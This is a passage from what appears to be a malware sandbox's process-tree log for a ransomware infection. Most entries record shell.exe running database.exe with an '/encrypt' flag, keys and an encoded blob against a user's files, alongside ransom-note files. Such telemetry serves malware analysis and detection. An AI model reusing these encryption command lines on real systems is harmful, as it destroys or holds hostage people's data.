                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\PushRedo.xlsm.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\README_sTlLoTpq.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\RemoveInstall.AAC.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\RemoveShow.mp2v.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ResetStep.M2TS.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ShowUndo.hta.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\StartResume.xml.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4212
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\StartRevoke.cmd.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\SwitchCompare.mhtml.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\SZsXBggf-GRFOCNEg.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\TraceConvert.aif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\UninstallInstall.ocx.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\UnpublishStop.MOD.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\UnpublishSubmit.wvx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3704
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\WatchGet.wmv.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
